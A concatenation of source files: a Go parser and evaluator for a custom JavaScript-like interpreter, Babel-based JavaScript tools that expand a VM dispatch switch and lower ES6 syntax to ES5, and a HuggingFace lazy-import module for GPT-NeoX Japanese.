			dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
			dds := parseAss(alldata)
			dshhh.Right = dds
			dtif = dshhh
		} else if alldata.getNextkey().TypeInfo == token.JIADEN {
			alldata.ShangOne = nil
			alldata.Start++
			dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
			dds := parseAss(alldata)
			dshhh.Right = dds
			return dshhh
		} else if alldata.getNextkey().TypeInfo == token.JANDEN {
			alldata.ShangOne = nil
			alldata.Start++
			dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
			dds := parseAss(alldata)
			dshhh.Right = dds
			return dshhh
		} else {
			alldata.ShangOne = dtife
			//hu := parseBin(alldata)
			//if hu == nil {
			//	dtif = dtife
			//} else {
			//	dtif = hu
			//}
			dtif = dtife
		}
	case token.YOUZ:
		// "[" in expression position: array literal.
		dtif = parseArray(alldata)
	case token.OVER:
		dtif = &ast.OVER{TypeInfo: token.OVER}
	case token.ZHUOK:
		dtif = parseYpuxianKuoHao(alldata)
	case token.CONTINUE:
		dtif = &ast.ContinueStatement{}
	case token.BREAK:
		dtif = &ast.BreakStatement{}
	case token.FUN:
		dtif = parseFun(alldata)
	// The following delimiter tokens are surfaced as OVER markers so that
	// enclosing parse loops know where a construct ends.
	case token.YOUOK:
		dtif = &ast.OVER{TypeInfo: token.YOUOK}
	case token.ZUOKH:
		dtif = &ast.OVER{TypeInfo: token.ZUOKH}
	case token.ZUOZ:
		dtif = &ast.OVER{TypeInfo: token.ZUOZ}
	case token.MAOHAO:
		dtif = &ast.OVER{TypeInfo: token.MAOHAO}
	case token.DH:
		dtif = &ast.OVER{TypeInfo: token.DH}
	default:
		// Anything else is treated as the start of a binary expression.
		dtif = parseBin(alldata, mytk)
	}
	//dtif.StatementNode()
	return dtif
}
// stardFun drives the parser over the whole token stream and collects the
// resulting top-level statements. OVER markers (statement terminators) are
// consumed but not emitted into the program body.
func stardFun(alldata *allDtInfo) []*ast.Statement {
	program := []*ast.Statement{}
	for {
		stmt := overYH(alldata)
		if stmt.StatementNode() != token.OVER {
			node := stmt
			program = append(program, &node)
			// Reset the "previous expression" slot before the next statement.
			alldata.ShangOne = nil
		}
		if alldata.isover() {
			break
		}
	}
	return program
}
// NewParse is the public entry point: it wraps a token list in the parser
// state object and returns the parsed program as a list of statements.
func NewParse(fd []*token.TokenType) []*ast.Statement {
	return stardFun(newdt(fd))
}
|
2833844911/cy_jsvmp | 3,471 | tool/gooutmvp.js | // 指令扩张
const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
// hsjsvmpTo expands a VM dispatch switch for obfuscation. It reads a mapping
// from './dist/jiamain.json' where key "z<opcode>" lists the alias opcode
// numbers for that case; for each alias it emits a duplicate switch case,
// randomly prepending (or inserting before a trailing break) filler
// statements harvested from a whitelist of duplicable cases.
function hsjsvmpTo(data){
    // case blocks whose bodies are safe to duplicate into other cases
    var cancallzhil = [ 1810,47, 36, 37, 38, 39, 53, 54, 550, 19, 291, 20, 24, 240,
        27, 28, 29, 30, 31, 32, 33, 34, 104, 105, 35, 56, 60, 194
    ];
    var cans = JSON.parse(fs.readFileSync('./dist/jiamain.json') + '')
    // let data = fs.readFileSync('./tool/jsvmp_02.js') + ''
    let ast = parser.parse(data)
    let parseNode = {
        SwitchStatement(path){
            var s = path.node.cases;
            // allcans: "z<opcode>" -> original consequent statements
            var allcans = {}
            // zcsz: the rebuilt case list that replaces path.node.cases
            var zcsz= [];
            // filler statement lists that can be mixed into real cases
            var cancallzhilw = [];
            var cbbs = path.get("cases")
            for (let i = 0; i < cbbs.length; i++){
                if (cbbs[i].node.test ==null){
                    continue
                }
                if (cancallzhil.indexOf(cbbs[i].node.test.value) !== -1){
                    let f = cbbs[i]
                    let fg = f.get("consequent")
                    let dat = ""
                    for (let i2 = 0; i2 < fg.length; i2++){
                        if (fg[i2].node.type === "BreakStatement"){
                            continue
                        }
                        // NOTE(review): the statement-emitting lines below are
                        // commented out, so `dat` accumulates only newlines and
                        // every harvested filler block ends up empty — confirm
                        // this is intentional.
                        // let code = fg[i2]+'';
                        // code = code.replace(/duei\.cF/g,"duei.sf")
                        // code = code.replace(/duei\.cf/g,"duei.sf")
                        // code = code.replace(/duei\.Cf/g,"duei.sf")
                        dat += "\n";
                    }
                    let bhu = parser.parse(dat)
                    cancallzhilw.push(bhu.program.body)
                }
            }
            for (let i = 0; i < s.length; i++){
                if (s[i].test ==null){
                    // default case: keep as-is
                    zcsz.push(s[i])
                    continue
                }
                allcans["z"+s[i].test.value] = s[i].consequent;
            }
            var skeyList = Object.keys(cans)
            for (let i =0; i< skeyList.length; i++){
                for (let i2 =0; i2 < cans[skeyList[i]].length; i2++){
                    // pick a random filler block and a random placement
                    let sjbc = Math.floor(Math.random() * cancallzhilw.length)
                    let bc;
                    if (Math.random() * 100 > 50){
                        bc = cancallzhilw[sjbc].concat( allcans[skeyList[i]]);
                    }else {
                        if (allcans[skeyList[i]][allcans[skeyList[i]].length -1].type === "BreakStatement"){
                            // keep the trailing break last: body + filler + break
                            let f = allcans[skeyList[i]].pop()
                            bc = allcans[skeyList[i]].concat(cancallzhilw[sjbc]);
                            bc.push(f)
                            allcans[skeyList[i]].push(f)
                        }else {
                            bc = cancallzhilw[sjbc].concat( allcans[skeyList[i]]);
                        }
                    }
                    zcsz.push(
                        tee.switchCase(
                            tee.numericLiteral(cans[skeyList[i]][i2]),
                            bc
                        )
                    )
                }
            }
            path.node.cases = zcsz;
        }
    }
    traverse(ast, parseNode)
    return generator(ast).code
}
// Export the instruction-expansion pass for use by the build pipeline.
exports.hsjsvmpTo = hsjsvmpTo;
|
2833844911/cy_jsvmp | 6,188 | tool/es5toes6.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
// es6toes5 lowers a few ES6+ constructs to ES5-compatible forms:
//  * for-of loops  -> index-based for loops (using a synthetic `cbbiyhh` counter)
//  * postfix ++/-- -> the bare expression plus a follow-up update statement
//  * object method shorthand -> `key: function(){...}` properties
//  * getters/setters -> Object.defineProperty calls inserted after the object
// Note: despite the file name, the function is named es6toes5 and converts
// ES6 down to ES5 (the exported name matches the function, not the filename).
function es6toes5(data) {
    // counter used to generate unique temp names for defineProperty results
    var ioio = 0
    var ast = parser.parse(data)
    let parseData = {
        ForOfStatement(path) {
            // isduo: 1 when the loop destructures an array pattern
            var isduo = 0;
            // isduolist: the identifier(s) receiving each element
            var isduolist = [];
            var initOfmyfor, testOfmyfor, upOfmyfor, bodyOfmyfor;
            if (path.node.left.type == "VariableDeclaration" && path.node.left.declarations[0].id.type == "Identifier"){
                // `for (var x of arr)`
                isduolist.push(path.node.left.declarations[0].id)
                initOfmyfor = tee.variableDeclaration("var", [path.node.left.declarations[0], tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0))])
            }else if(path.node.left.type == "VariableDeclaration" && path.node.left.declarations[0].id.type == "ArrayPattern"){
                // `for (var [a, b] of arr)`
                let hxdd =[];
                isduo = 1
                for (let i =0; i < path.node.left.declarations[0].id.elements.length; i++){
                    isduolist.push(path.node.left.declarations[0].id.elements[i])
                    hxdd.push(tee.variableDeclarator(path.node.left.declarations[0].id.elements[i], null))
                }
                hxdd.push(tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0)))
                initOfmyfor = tee.variableDeclaration("var", hxdd)
            }else if(path.node.left.type == "Identifier"){
                // `for (x of arr)` — x already declared elsewhere
                isduolist.push(path.node.left)
                initOfmyfor = tee.variableDeclaration("var", [tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0))])
            }else if(path.node.left.type == "ArrayPattern"){
                // `for ([a, b] of arr)` — pattern over existing identifiers
                let hxdd =[];
                isduo = 1
                for (let i =0; i < path.node.left.elements.length; i++){
                    isduolist.push(path.node.left.elements[i])
                }
                hxdd.push(tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0)))
                initOfmyfor = tee.variableDeclaration("var", hxdd)
            }else{
                log("for of 条件有缺失")
            }
            // cbbiyhh < arr.length ; cbbiyhh++
            testOfmyfor = tee.binaryExpression("<", tee.identifier("cbbiyhh"), tee.memberExpression(path.node.right, tee.identifier("length")))
            upOfmyfor = tee.updateExpression("++",tee.identifier("cbbiyhh"),false)
            var body = [];
            if (isduo === 1){
                // destructuring: a = arr[cbbiyhh][i] for each element
                for (let i =0; i< isduolist.length; i++){
                    body.push(
                        tee.expressionStatement(tee.assignmentExpression("=", isduolist[i], tee.memberExpression(tee.memberExpression(path.node.right, tee.identifier("cbbiyhh"),true,false), tee.numericLiteral(i),true,false)))
                    )
                }
            }else{
                // single binding: x = arr[cbbiyhh]
                body.push(
                    tee.expressionStatement( tee.assignmentExpression("=", isduolist[0], tee.memberExpression(path.node.right, tee.identifier("cbbiyhh"),true,false)))
                )
            }
            if (path.node.body.type == "BlockStatement"){
                body = body.concat(path.node.body.body)
            }else{
                body.push(path.node.body)
            }
            bodyOfmyfor = tee.blockStatement(
                body
            )
            var forme = tee.forStatement(initOfmyfor, testOfmyfor, upOfmyfor, bodyOfmyfor)
            path.replaceInline(forme)
        },
        UpdateExpression(path){
            // Postfix x++ becomes `x` followed by a prefix `++x` statement.
            // NOTE(review): this is only value-equivalent where the original
            // result was discarded (statement position) — confirm callers.
            if (path.node.prefix === false){
                var hm = path.node.argument
                var hmk = path.node.operator
                path.replaceInline(hm)
                path.insertAfter(tee.updateExpression(hmk,hm, true))
                path.skip()
            }
        },
        ObjectExpression(path){
            // ofg: property name -> { get/set implementations } collected below
            var ofg = {}
            // off: 1 when at least one getter/setter was found
            var off = 0
            var hj = path.get("properties")
            for (let i=0; i< hj.length; i++){
                if (hj[i].node.type === "ObjectMethod"){
                    if (hj[i].node.kind === "method"){
                        // shorthand method -> plain function-valued property
                        hj[i].replaceInline( tee.objectProperty(hj[i].node.key, tee.functionExpression(null,hj[i].node.params, hj[i].node.body)))
                        continue
                    }
                    off = 1
                    if (!ofg[hj[i].node.key.name]){
                        ofg[hj[i].node.key.name] = {}
                        ofg[hj[i].node.key.name]['keyme'] = []
                        ofg[hj[i].node.key.name]['value'] = tee.ObjectExpression(ofg[hj[i].node.key.name]['keyme'])
                    }
                    // descriptor entry: { get: fn } or { set: fn }
                    ofg[hj[i].node.key.name]['keyme'].push(
                        tee.ObjectProperty(tee.valueToNode(hj[i].node.kind), tee.functionExpression(null,hj[i].node.params, hj[i].node.body))
                    );
                    hj[i].remove()
                }
            }
            if (off === 1){
                // vvh: the variable the object literal is assigned to; the
                // defineProperty calls are attached to it after the assignment.
                let vvh;
                if(path.parentPath.isAssignmentExpression()){
                    vvh = path.parentPath.node.left;
                }else if (path.parentPath.isVariableDeclarator()){
                    vvh = path.parentPath.node.id;
                }
                for (let i in ofg){
                    let jipo = tee.assignmentExpression("=",
                        tee.identifier("cbbbbyhhhh"+ioio),
                        tee.callExpression(
                            tee.memberExpression(tee.identifier("Object"),tee.identifier("defineProperty")),
                            [
                                vvh,tee.valueToNode(i), ofg[i]['value']
                            ]
                        )
                    )
                    ioio+=1
                    path.parentPath.insertAfter(jipo)
                }
            }
        }
    }
    traverse(ast, parseData)
    var data = generator(ast).code
    return data;
}
// Export the lowering pass; the commented block below is a manual test driver.
exports.es6toes5 = es6toes5;
// var data = fs.readFileSync('./test.js') + ''
// var f = es6toes5(data);
// fs.writeFileSync("../out.js", f, (e)=>{})
//
27182812/ChatGLM-LLaMA-chinese-insturct | 2,154 | src/transformers/models/gpt_neox_japanese/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...file_utils import _LazyModule, is_torch_available
from ...utils import OptionalDependencyNotAvailable
# Map of submodule name -> public symbols, consumed by _LazyModule so that
# heavyweight imports only happen on first attribute access.
_import_structure = {
    "configuration_gpt_neox_japanese": ["GPT_NEOX_JAPANESE_PRETRAINED_CONFIG_ARCHIVE_MAP", "GPTNeoXJapaneseConfig"],
    "tokenization_gpt_neox_japanese": ["GPTNeoXJapaneseTokenizer"],
}
# The modeling module requires torch; register it only when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_gpt_neox_japanese"] = [
        "GPT_NEOX_JAPANESE_PRETRAINED_MODEL_ARCHIVE_LIST",
        "GPTNeoXJapaneseForCausalLM",
        "GPTNeoXJapaneseLayer",
        "GPTNeoXJapaneseModel",
        "GPTNeoXJapanesePreTrainedModel",
    ]
# Static type checkers see the real imports below; at runtime the module is
# replaced by a _LazyModule proxy that resolves names from _import_structure
# on demand.
if TYPE_CHECKING:
    from .configuration_gpt_neox_japanese import GPT_NEOX_JAPANESE_PRETRAINED_CONFIG_ARCHIVE_MAP, GPTNeoXJapaneseConfig
    from .tokenization_gpt_neox_japanese import GPTNeoXJapaneseTokenizer
    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_gpt_neox_japanese import (
            GPT_NEOX_JAPANESE_PRETRAINED_MODEL_ARCHIVE_LIST,
            GPTNeoXJapaneseForCausalLM,
            GPTNeoXJapaneseLayer,
            GPTNeoXJapaneseModel,
            GPTNeoXJapanesePreTrainedModel,
        )
else:
    import sys
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
2833844911/gojsvmp | 77,315 | evaluator/evaluator.go | package evaluator
import (
"bufio"
"encoding/base64"
"fmt"
"math"
"myvmp/ast"
"myvmp/banding"
"myvmp/lexer"
"myvmp/object"
"myvmp/parse"
"myvmp/parseToDt"
"myvmp/promise"
"myvmp/require"
"myvmp/token"
"os"
"strconv"
"strings"
"sync"
"unicode/utf8"
)
// Zhidy maps built-in (native) function names to their Go implementations;
// yunxCall consults it when a called identifier does not resolve to a
// user-defined function in the environment.
var Zhidy map[string]*func([]*object.Object) object.Object
// binString applies a binary operator to two operands using string semantics
// (the fallback when at least one side is not numeric). "+" concatenates;
// arithmetic operators yield NaN; bitwise-looking operators yield 0;
// comparisons compare lexicographically. Unknown operators return NaN.
func binString(dtt string, dttr string, typee string) object.Object {
	switch typee {
	case token.ADD:
		return &object.StringObject{Value: dtt + dttr}
	case token.SDD: // arithmetic on strings: NaN, matching JS-like behavior
		return &object.NanObject{}
	case token.CHEN: // arithmetic on strings: NaN
		return &object.NanObject{}
	case token.CHU: // arithmetic on strings: NaN
		return &object.NanObject{}
	case token.XIAOYHYH:
		return &object.NumericObject{Value: 0}
	case token.XIAOYHYHYH:
		return &object.NumericObject{Value: 0}
	case token.DAYHYH:
		return &object.NumericObject{Value: 0}
	case token.YIHUO:
		return &object.NumericObject{Value: 0}
	case token.DAYHYHYU:
		return &object.NumericObject{Value: 0}
	case token.XIAND:
		return &object.BoolObject{Value: dtt == dttr}
	case token.XIAOYH:
		return &object.BoolObject{Value: dtt < dttr}
	case token.DAYH:
		return &object.BoolObject{Value: dtt > dttr}
	case token.DAYHDY:
		return &object.BoolObject{Value: dtt >= dttr}
	case token.XIAOYHDY:
		return &object.BoolObject{Value: dtt <= dttr}
	case token.BUDY:
		return &object.BoolObject{Value: dtt != dttr}
	case token.BUDYDY:
		// NOTE(review): strict != falls back to plain string inequality here.
		return &object.BoolObject{Value: dtt != dttr}
	}
	return &object.NanObject{}
}
// binInt applies a binary operator to two numeric operands (booleans are
// coerced to 0/1 by the caller). Arithmetic operates on float64; shift and
// bitwise operators truncate to int64 first. Returns nil for operators it
// does not recognize.
func binInt(dtt float64, dttr float64, typee string) object.Object {
	switch typee {
	case token.ADD:
		return &object.NumericObject{Value: dtt + dttr}
	case token.SDD: // subtraction
		return &object.NumericObject{Value: dtt - dttr}
	case token.KAIFAN: // exponentiation
		num := math.Pow(dtt, dttr)
		return &object.NumericObject{Value: num}
	case token.CHEN: // multiplication
		return &object.NumericObject{Value: dtt * dttr}
	case token.CHU: // division
		return &object.NumericObject{Value: dtt / dttr}
	case token.XIAOYHYH:
		// left shift on truncated int64 operands
		return &object.NumericObject{Value: float64(int64(dtt) << int64(dttr))}
	case token.XIAOYHYHYH:
		// NOTE(review): Go precedence makes this (dtt << dttr) + 100; the
		// "+ 100" diverges from the plain shift in XIAOYHYH and looks like
		// deliberate trap/obfuscation or a leftover — confirm intent.
		dsd := float64(int64(dtt)<<int64(dttr) + 100)
		return &object.NumericObject{Value: dsd}
	case token.DAYHYH:
		return &object.NumericObject{Value: float64(int64(dtt) >> int64(dttr))}
	case token.QUYU:
		// integer modulo
		return &object.NumericObject{Value: float64(int64(dtt) % int64(dttr))}
	case token.DAYHYHYU:
		// NOTE(review): implemented as a signed shift, same as DAYHYH —
		// if this token is JS ">>>", unsigned semantics would differ.
		return &object.NumericObject{Value: float64(int64(dtt) >> int64(dttr))}
	case token.XIAND:
		return &object.BoolObject{Value: dtt == dttr}
	case token.XIAOYH:
		return &object.BoolObject{Value: dtt < dttr}
	case token.DAYH:
		return &object.BoolObject{Value: dtt > dttr}
	case token.DAYHDY:
		return &object.BoolObject{Value: dtt >= dttr}
	case token.YIHUO:
		// bitwise xor
		return &object.NumericObject{Value: float64(int(dtt) ^ int(dttr))}
	case token.XIAOYHDY:
		return &object.BoolObject{Value: dtt <= dttr}
	case token.BUDY:
		return &object.BoolObject{Value: dtt != dttr}
	case token.BUDYDY:
		return &object.BoolObject{Value: dtt != dttr}
	case token.HUO:
		// NOTE(review): returns truthiness, not a bitwise-or number —
		// verify against the token's intended semantics.
		return &object.BoolObject{Value: dtt != 0 || dttr != 0}
	case token.HUOHUO:
		// JS-style "||": yields the first truthy operand (as a number),
		// otherwise the boolean false.
		ds := &object.NumericObject{Value: dtt}
		var dsj object.Object = ds
		dsr := &object.NumericObject{Value: dttr}
		var dsjr object.Object = dsr
		if getBoolInfo(&dsj).Value {
			return ds
		} else if getBoolInfo(&dsjr).Value {
			return dsr
		}
		return &object.BoolObject{Value: false}
	case token.YU:
		// NOTE(review): returns truthiness, not a bitwise-and number.
		return &object.BoolObject{Value: dtt != 0 && dttr != 0}
	case token.YUYU:
		return &object.BoolObject{Value: dtt != 0 && dttr != 0}
	}
	return nil
}
// yunxBin evaluates a binary expression node. "&&" and "||" short-circuit on
// the left operand; otherwise both sides are evaluated, coerced (numbers and
// booleans go through binInt, everything else falls back to string semantics
// via binString), with special identity comparisons for arrays, objects and
// environments.
func yunxBin(dtt *ast.Statement, env *object.Environment) object.Object {
	ddd := (*dtt).(*ast.BinaryExpression)
	leftData := ParseData(&ddd.Left, env)
	if ddd.Operator == token.YUYU {
		// "&&": a falsy left operand short-circuits.
		jj := getBoolInfo(&leftData)
		if !jj.Value {
			return &jj
		}
	} else if ddd.Operator == token.HUOHUO {
		// "||": a truthy left operand short-circuits to itself.
		jj := getBoolInfo(&leftData)
		if jj.Value {
			return leftData
		}
	}
	rightData := ParseData(&ddd.Right, env)
	if leftData.Type() == token.TYNUM && rightData.Type() == token.TYNUM {
		return binInt(leftData.(*object.NumericObject).Value, rightData.(*object.NumericObject).Value, ddd.Operator)
	} else if leftData.Type() == token.BOOL && rightData.Type() == token.BOOL {
		// booleans are coerced to 0/1 for arithmetic/comparison
		var zuo float64
		if leftData.(*object.BoolObject).Value {
			zuo = 1
		} else {
			zuo = 0
		}
		var yuo float64
		if rightData.(*object.BoolObject).Value {
			yuo = 1
		} else {
			yuo = 0
		}
		return binInt(zuo, yuo, ddd.Operator)
	} else if leftData.Type() == token.TYNUM && rightData.Type() == token.BOOL {
		var zuo float64
		zuo = leftData.(*object.NumericObject).Value
		var yuo float64
		if rightData.(*object.BoolObject).Value {
			yuo = 1
		} else {
			yuo = 0
		}
		return binInt(zuo, yuo, ddd.Operator)
	} else if leftData.Type() == token.BOOL && rightData.Type() == token.TYNUM {
		var zuo float64
		if leftData.(*object.BoolObject).Value {
			zuo = 1
		} else {
			zuo = 0
		}
		var yuo float64
		yuo = rightData.(*object.NumericObject).Value
		return binInt(zuo, yuo, ddd.Operator)
	} else {
		// Reference types: ==/===/!=/!== compare identity (same underlying
		// *object.Environment); everything else degrades to string semantics.
		if rightData.Type() == token.ArrayE && leftData.Type() == token.ArrayE && (ddd.Operator == token.DXIAND || ddd.Operator == token.XIAND || ddd.Operator == token.BUDY || ddd.Operator == token.BUDYDY) {
			nkl := rightData.(*object.Environment)
			nkle := leftData.(*object.Environment)
			switch ddd.Operator {
			case token.DXIAND:
				return &object.BoolObject{Value: nkl == nkle}
			case token.XIAND:
				return &object.BoolObject{Value: nkl == nkle}
			case token.BUDY:
				return &object.BoolObject{Value: nkl != nkle}
			case token.BUDYDY:
				return &object.BoolObject{Value: nkl != nkle}
			}
		} else if rightData.Type() == token.Object && leftData.Type() == token.Object && (ddd.Operator == token.DXIAND || ddd.Operator == token.XIAND || ddd.Operator == token.BUDY || ddd.Operator == token.BUDYDY) {
			nkl := rightData.(*object.Environment)
			nkle := leftData.(*object.Environment)
			switch ddd.Operator {
			case token.DXIAND:
				return &object.BoolObject{Value: nkl == nkle}
			case token.XIAND:
				return &object.BoolObject{Value: nkl == nkle}
			case token.BUDY:
				return &object.BoolObject{Value: nkl != nkle}
			case token.BUDYDY:
				return &object.BoolObject{Value: nkl != nkle}
			}
		} else if (rightData.Type() == token.ENV || rightData.Type() == token.THIS) && (leftData.Type() == token.ENV || rightData.Type() == token.THIS) && (ddd.Operator == token.DXIAND || ddd.Operator == token.XIAND || ddd.Operator == token.BUDY || ddd.Operator == token.BUDYDY) {
			// NOTE(review): the second condition re-tests rightData instead of
			// leftData — looks like a copy/paste slip; confirm before changing.
			nkl := rightData.(*object.Environment)
			nkle := leftData.(*object.Environment)
			switch ddd.Operator {
			case token.DXIAND:
				return &object.BoolObject{Value: nkl == nkle}
			case token.XIAND:
				return &object.BoolObject{Value: nkl == nkle}
			case token.BUDY:
				return &object.BoolObject{Value: nkl != nkle}
			case token.BUDYDY:
				return &object.BoolObject{Value: nkl != nkle}
			}
		}
		rightStr := rightData.ToString()
		leftStr := leftData.ToString()
		return binString(leftStr, rightStr, ddd.Operator)
	}
	// unreachable: every branch above returns
	return rightData
}
// yunxINT evaluates a numeric literal node into a runtime numeric object.
func yunxINT(dtt *ast.Statement) object.Object {
	lit := (*dtt).(*ast.NumericLiteral)
	return &object.NumericObject{Value: lit.Value}
}
// yunxStr evaluates a string literal node into a runtime string object.
func yunxStr(dtt *ast.Statement) object.Object {
	lit := (*dtt).(*ast.StringLiteral)
	return &object.StringObject{Value: lit.Value}
}
// yunxVar evaluates a `var` declaration: the initializer is computed once and
// bound to every declared identifier in the current environment.
func yunxVar(dtt *ast.Statement, env *object.Environment) object.Object {
	decl := (*dtt).(*ast.VariableDeclaration)
	value := ParseData(&decl.Init, env)
	for _, name := range decl.Declarations {
		ident := (*name).(*ast.Identifier)
		env.Store.Set(ident.Name, value)
	}
	return nil
}
// yunxIDENT resolves an identifier by walking the environment chain.
func yunxIDENT(dtt *ast.Statement, env *object.Environment) object.Object {
	ident := (*dtt).(*ast.Identifier)
	return findKey(ident.Name, env)
}
// getBoolInfo coerces a runtime object to a boolean: nil, null, NaN and the
// number 0 are falsy; a BoolObject keeps its own value; everything else
// (strings, objects, arrays, functions, ...) is truthy.
func getBoolInfo(dt *object.Object) object.BoolObject {
	obj := *dt
	if obj == nil {
		return object.BoolObject{Value: false}
	}
	switch obj.Type() {
	case token.BOOL:
		return *(obj.(*object.BoolObject))
	case token.TYNUM:
		num := obj.(*object.NumericObject)
		return object.BoolObject{Value: num.Value != 0}
	case token.NULL, token.NANINFO:
		return object.BoolObject{Value: false}
	}
	return object.BoolObject{Value: true}
}
// hebing ("merge") folds an assignment operator into a value: plain "="
// returns the right-hand side unchanged, while "+=" / "-=" re-evaluate the
// left-hand target and combine it with the right-hand side. Numeric pairs go
// through binInt; any other pairing degrades to string semantics. Returns
// nil for operators it does not recognize.
func hebing(as ast.Statement, rightData object.Object, optt string, env *object.Environment) object.Object {
	switch optt {
	case token.DENYU:
		return rightData
	case token.JIADEN:
		leftData := ParseData(&as, env)
		if leftData.Type() == token.TYNUM && rightData.Type() == token.TYNUM {
			return binInt(leftData.(*object.NumericObject).Value, rightData.(*object.NumericObject).Value, token.ADD)
		} else {
			rightStr := rightData.ToString()
			leftStr := leftData.ToString()
			return binString(leftStr, rightStr, token.ADD)
		}
	case token.JANDEN:
		leftData := ParseData(&as, env)
		if leftData.Type() == token.TYNUM && rightData.Type() == token.TYNUM {
			return binInt(leftData.(*object.NumericObject).Value, rightData.(*object.NumericObject).Value, token.SDD)
		} else {
			// string "-=" yields NaN via binString's SDD case
			rightStr := rightData.ToString()
			leftStr := leftData.ToString()
			return binString(leftStr, rightStr, token.SDD)
		}
	}
	return nil
}
// yunxAss evaluates an assignment expression: computes the right-hand side,
// folds it with the operator (=, +=, -=) via hebing, then stores the result
// into either a plain identifier or a member target (byte-buffer index,
// array index with JS-style auto-grow, or object property).
func yunxAss(dtt *ast.Statement, env *object.Environment) object.Object {
	ddd := (*dtt).(*ast.AssignmentExpression)
	Valuee := ParseData(&ddd.Right, env)
	Value := hebing(ddd.Left, Valuee, ddd.Operator, env)
	key := ddd.Left // the target may also be a member expression, handled below
	if key.StatementNode() == token.IDENT {
		data := setKey(key.(*ast.Identifier).Name, Value, env)
		return data
	}
	if key.StatementNode() == token.Member {
		keyValue := key.(*ast.MemberExpression)
		mnnn := ParseData(&keyValue.Object, env)
		zkey := ParseData(&keyValue.Property, env)
		if mnnn.Type() == token.BYTE {
			// byte-buffer write: index and value must both be numeric
			zkey2 := zkey.(*object.NumericObject)
			Value2 := Value.(*object.NumericObject)
			dmmm := mnnn.(*object.ByteObject)
			dmmm.Value[int(zkey2.Value)] = byte(Value2.Value)
		} else {
			nj := mnnn.(*object.Environment)
			if nj.Type() == token.ArrayE && zkey.Type() == token.TYNUM {
				zkey2 := zkey.(*object.NumericObject)
				if int(zkey2.Value) >= len(nj.Value) {
					// grow the slice so the index is in range (sparse write)
					newSlice := make([]*object.Object, int(zkey2.Value)+1)
					copy(newSlice, nj.Value)
					nj.Value = newSlice
				}
				nj.Value[int(zkey2.Value)] = &Value
			} else {
				// object property write: numeric keys normalize to strings
				var strkey string
				if zkey.Type() == token.TYNUM {
					zkey2 := zkey.(*object.NumericObject)
					strkey = strconv.Itoa(int(zkey2.Value))
				} else {
					zkey2 := zkey.(*object.StringObject)
					strkey = zkey2.Value
				}
				//nj.Store[strkey] = Value
				nj.Store.Set(strkey, Value)
				//setKey(strkey, Value, nj)
			}
		}
	}
	return Value
}
// yunxUpINfo writes Value back into an lvalue for ++/-- updates: either a
// plain identifier or a member target (array index with auto-grow, or object
// property with numeric keys normalized to strings). Unlike yunxAss it does
// not handle byte buffers.
func yunxUpINfo(key ast.Statement, env *object.Environment, Value object.Object) object.Object {
	if key.StatementNode() == token.IDENT {
		data := setKey(key.(*ast.Identifier).Name, Value, env)
		return data
	}
	if key.StatementNode() == token.Member {
		keyValue := key.(*ast.MemberExpression)
		mnnn := ParseData(&keyValue.Object, env)
		zkey := ParseData(&keyValue.Property, env)
		nj := mnnn.(*object.Environment)
		if nj.Type() == token.ArrayE && zkey.Type() == token.TYNUM {
			zkey2 := zkey.(*object.NumericObject)
			if int(zkey2.Value) >= len(nj.Value) {
				// grow the slice so the index is in range
				newSlice := make([]*object.Object, int(zkey2.Value)+1)
				copy(newSlice, nj.Value)
				nj.Value = newSlice
			}
			nj.Value[int(zkey2.Value)] = &Value
		} else {
			var strkey string
			if zkey.Type() == token.TYNUM {
				zkey2 := zkey.(*object.NumericObject)
				strkey = strconv.Itoa(int(zkey2.Value))
			} else {
				zkey2 := zkey.(*object.StringObject)
				strkey = zkey2.Value
			}
			//nj.Store[strkey] = Value
			nj.Store.Set(strkey, Value)
			//setKey(strkey, Value, nj)
		}
	}
	return Value
}
// yunxIfStat evaluates an if/else statement. Control-flow sentinels produced
// inside the taken branch (break / continue / return) are propagated to the
// caller; any other result is swallowed.
func yunxIfStat(dtt *ast.Statement, env *object.Environment) object.Object {
	stmt := (*dtt).(*ast.IfStatement)
	cond := ParseData(&stmt.Test, env)
	// choose exactly one branch; the other is never evaluated
	branch := &stmt.Alternate
	if getBoolInfo(&cond).Value {
		branch = &stmt.Consequent
	}
	res := ParseData(branch, env)
	if res != nil {
		switch res.Type() {
		case token.BREAK, token.CONTINUE, token.RETURN:
			return res
		}
	}
	return nil
}
// yunxBlock runs a block statement inside a fresh child scope, bubbling up
// break/continue/return sentinels as soon as one is produced.
func yunxBlock(dtt *ast.Statement, envup *object.Environment) object.Object {
	scope := object.NewEnv(envup)
	for _, stmt := range (*dtt).(*ast.BlockStatement).Body {
		res := ParseData(stmt, scope)
		if res == nil {
			continue
		}
		switch res.Type() {
		case token.BREAK, token.CONTINUE, token.RETURN:
			return res
		}
	}
	return nil
}
// yunxBleak produces the sentinel object that unwinds loops on `break`.
func yunxBleak(dtt *ast.Statement, envup *object.Environment) object.Object {
	sentinel := object.BreakObject{}
	return &sentinel
}
// yunxCONTINUE produces the sentinel object that skips to the next loop
// iteration on `continue`.
func yunxCONTINUE(dtt *ast.Statement, envup *object.Environment) object.Object {
